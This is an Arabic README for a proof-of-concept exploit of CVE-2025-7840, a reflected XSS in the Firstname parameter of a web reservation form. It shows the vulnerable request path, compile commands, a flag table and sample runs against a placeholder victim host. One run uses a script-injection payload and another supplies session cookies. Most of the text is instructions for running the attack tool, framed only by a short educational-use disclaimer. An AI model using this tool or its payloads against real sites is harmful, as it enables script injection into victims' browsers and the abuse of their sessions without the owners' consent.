
إثبات مفهوم استغلال الثغرة CVE‑2025‑7840 الذي يحقن حمولات ضارة في معامل Firstname في نموذج حجز لتفعيل XSS
المؤلف: Byte Reaper (@ByteReaper0)
إثبات المفهوم لاستغلال CVE-2025-7840، يستهدف نقطة نهاية تطبيق ويب ضعيفة تفشل في تنقية إدخال المستخدم على معامل Firstname في نموذج حجز. من خلال صياغة طلب GET إلى:
/index.php?page=reserve&Firstname=<payload>&Lastname=test
يمكن للمهاجم حقن وتنفيذ JavaScript عشوائية في متصفح الضحية عند عرض الرد.
-b-c-v)libcurlargparse للغة Cقم بترجمة الاستغلال:
gcc -o exploit exploit.c argparse.c -lcurl
sudo ./exploit -u <TARGET_URL> [options]
| العلامة | الوصف |
|---|---|
-u URL | URL الأساسي للهدف (مثل http://victim.local) |
-b PAYLOAD | حمولة XSS مخصصة للحقن |
-c FILE | ملف jar الكوكيز لاستخدامه في التعامل مع الجلسة |
-v | وضع مفصل (عرض تفاصيل الطلب/الرد) |
تشغيل الحمولات الافتراضية ضد هدف:
sudo ./exploit -u http://victim.local
استخدام حمولة مخصصة:
sudo ./exploit -u http://victim.local -b "<script>alert(\'PWNED\')</script>"
تضمين كوكيز الجلسة وإخراج مفصل:
sudo ./exploit -u http://victim.local -c cookies.txt -v
هذا الكود مقدم لأغراض تعليمية واختبارية فقط. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني وغير أخلاقي.
MIT